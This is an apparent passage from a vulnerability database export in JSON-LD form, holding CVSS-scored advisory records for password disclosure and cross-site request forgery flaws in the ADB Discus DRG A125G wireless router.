"db": "VULMON",
"id": "CVE-2018-13108"
},
{
"date": "2018-09-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-13108"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural ADB Vulnerabilities related to access control in broadband gateways and routers",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
],
"trust": 0.6
}
}
VAR-201311-0449
Vulnerability from variot - Updated: 2022-05-17 02:10
Discus DRG A125G is a wireless router product from the Swiss company ADB. An information disclosure vulnerability exists in Discus DRG A125G. Attackers can use this vulnerability to obtain sensitive information that can help launch further attacks. Discus DRG A125G is vulnerable; other versions may also be affected.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201311-0449",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "discus drg a125g",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
},
{
"model": "discus drg a125g",
"scope": "eq",
"trust": 0.3,
"vendor": "adb",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
},
{
"db": "BID",
"id": "63905"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sebastin Magof",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-436"
}
],
"trust": 0.6
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-14741",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2013-14741",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Discus DRG A125G is a wireless router product from Swiss ADB company. \nAn information disclosure vulnerability exists in Discus DRG A125G. Attackers can use this vulnerability to obtain sensitive information that can help launch further attacks. \nDiscus DRG A125G is vulnerable; other versions may also be affected",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-436"
},
{
"db": "BID",
"id": "63905"
}
],
"trust": 1.35
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "63905",
"trust": 1.5
},
{
"db": "CNVD",
"id": "CNVD-2013-14741",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201311-436",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
},
{
"db": "BID",
"id": "63905"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-436"
}
]
},
"id": "VAR-201311-0449",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
}
],
"trust": 1.4
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
}
]
},
"last_update_date": "2022-05-17T02:10:39.017000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/63905"
},
{
"trust": 0.3,
"url": "http://broadband.adbglobal.com/"
},
{
"trust": 0.3,
"url": "www.pirellibroadband.com"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
},
{
"db": "BID",
"id": "63905"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-436"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
},
{
"db": "BID",
"id": "63905"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-436"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14741"
},
{
"date": "2013-11-24T00:00:00",
"db": "BID",
"id": "63905"
},
{
"date": "2013-11-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-436"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14741"
},
{
"date": "2013-11-24T00:00:00",
"db": "BID",
"id": "63905"
},
{
"date": "2013-12-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-436"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-436"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ADB Discus DRG A125G \u0027wlbasic.html\u0027 Password Information Disclosure Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
},
{
"db": "BID",
"id": "63905"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-436"
}
],
"trust": 0.6
}
}
VAR-201311-0488
Vulnerability from variot - Updated: 2022-05-17 01:45
ADB Discus DRG A125G wlbasic.wl and wladv.wl have cross-site request forgery vulnerabilities that allow remote attackers to build malicious URIs, entice users to open them, and perform malicious operations in the target user's context. Discus DRG A125G is a wireless router product from the Swiss company ADB. A cross-site request forgery vulnerability exists in the ADB Discus DRG A125G router. A remote attacker could use this vulnerability to perform unauthorized operations and take control of an affected device.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201311-0488",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "discus drg a125g",
"scope": null,
"trust": 0.9,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
},
{
"db": "BID",
"id": "63907"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sebastin Magof",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-438"
}
],
"trust": 0.6
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.8,
"id": "CNVD-2013-14742",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2013-14742",
"trust": 0.6,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ADB Discus DRG A125G wlbasic.wl and wladv.wl have cross-site request forgery vulnerabilities that allow remote attackers to build malicious URIs, entice users to resolve, and perform malicious operations in the target user context. Discus DRG A125G is a wireless router product from Swiss ADB company. \nCross-site request forgery vulnerability exists in ADB Discus DRG A125G router. A remote attacker could use this vulnerability to perform unauthorized operations and take control of an affected device",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-438"
},
{
"db": "BID",
"id": "63907"
}
],
"trust": 1.35
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "63907",
"trust": 1.5
},
{
"db": "CNVD",
"id": "CNVD-2013-14742",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201311-438",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
},
{
"db": "BID",
"id": "63907"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-438"
}
]
},
"id": "VAR-201311-0488",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
}
],
"trust": 1.4
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
}
]
},
"last_update_date": "2022-05-17T01:45:23.686000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/63907"
},
{
"trust": 0.3,
"url": "http://www.pirellibroadband.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
},
{
"db": "BID",
"id": "63907"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-438"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
},
{
"db": "BID",
"id": "63907"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-438"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14742"
},
{
"date": "2013-11-24T00:00:00",
"db": "BID",
"id": "63907"
},
{
"date": "2013-11-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-438"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14742"
},
{
"date": "2013-11-24T00:00:00",
"db": "BID",
"id": "63907"
},
{
"date": "2013-12-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-438"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-438"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple Cross-Site Request Forgery Vulnerabilities in ADB Discus DRG A125G",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-438"
}
],
"trust": 0.6
}
}
VAR-201310-0700
Vulnerability from variot - Updated: 2022-05-17 01:43
The ADB Discus DRG A125G 'wansinglecfg.cmd' script has a security vulnerability that allows a remote attacker to submit a request for password information. Discus DRG A125G is a wireless router product from the Swiss company ADB. A password disclosure vulnerability exists in Discus DRG A125G. Attackers can use this vulnerability to obtain sensitive information that can help launch further attacks. Discus DRG A125G is vulnerable; other versions may also be affected.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201310-0700",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "discus drg a125g",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sebastin Magof",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201310-686"
}
],
"trust": 0.6
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-14198",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2013-14198",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The ADB Discus DRG A125G \u0027wansinglecfg.cmd\u0027 script has a security vulnerability that allows a remote attacker to exploit a vulnerability to submit a request for password information. Discus DRG A125G is a wireless router product from Swiss ADB company. \nA password disclosure vulnerability exists in Discus DRG A125G. Attackers can use this vulnerability to obtain sensitive information that can help launch further attacks. Discus DRG A125G version has vulnerabilities, other versions may also be affected",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-686"
},
{
"db": "BID",
"id": "63393"
}
],
"trust": 1.35
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "63393",
"trust": 1.5
},
{
"db": "CNVD",
"id": "CNVD-2013-14198",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201310-686",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
},
{
"db": "BID",
"id": "63393"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-686"
}
]
},
"id": "VAR-201310-0700",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
}
],
"trust": 1.4
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
}
]
},
"last_update_date": "2022-05-17T01:43:24.099000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/63393"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-686"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
},
{
"db": "BID",
"id": "63393"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-686"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14198"
},
{
"date": "2013-10-29T00:00:00",
"db": "BID",
"id": "63393"
},
{
"date": "2013-10-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201310-686"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14198"
},
{
"date": "2013-10-29T00:00:00",
"db": "BID",
"id": "63393"
},
{
"date": "2013-10-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201310-686"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201310-686"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ADB Discus DRG A125G \u0027wansinglecfg.cmd\u0027 Password Disclosure Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
},
{
"db": "BID",
"id": "63393"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201310-686"
}
],
"trust": 0.6
}
}